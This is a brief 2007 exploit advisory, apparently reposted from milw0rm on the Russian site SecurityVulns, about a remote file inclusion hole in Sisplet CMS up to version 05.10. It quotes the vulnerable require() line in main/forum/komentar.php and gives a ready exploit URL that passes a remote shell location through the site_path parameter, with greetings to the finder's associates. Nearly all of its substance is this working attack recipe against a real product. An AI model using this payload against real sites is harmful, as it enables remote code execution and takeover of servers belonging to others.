Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  PunBB <= 1.2.14 Multiple Vulnerabilities (Advisory)

  phpGalleryScript 1.0 (init.gallery.
php include_class) RFI Vulnerability

  RFI Weatimages Hack

  Crea-Book <= 1.0 Admin Access Bypass / DB Disclosure / Code Execution

From:kezzap66345 <kezzap66345_(at)_hotmail.com>
Date:11 апреля 2007 г.
Subject:Sisplet CMS <= 05.10 (site_path) Remote File Inclusion Vulnerability

Sisplet CMS
*****************
Found by kezzap66345 *
*****************
*****************
Script Download:http://www.sisplet.org/uploadi/editor/Sisplet0504.tar.bz2
       https://sourceforge.net/project/showfiles.php?group_id=111881

*****************
*****************
ERROR#1:
File:main/forum/komentar.php
*****************


require($site_path.'main/forum/class.php');     <<< rfi coded


*********************************************************************************
*****
RFI#1:

http://SITE.com/path/main/forum/komentar.php?site_path=[SHELL]


*********************************************************************************
*****
*********************************************************************************
*****
Thanks:Siircicocuk and x0r0n
*********************************************************************************
*****
*********************************************************************************
*****
*********************************************************************************
*****
*********************************************************************************
*****
******Thanx****SiiRCiCOCUK****str0ke*********************************************
*****

# milw0rm.com [2007-04-05]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород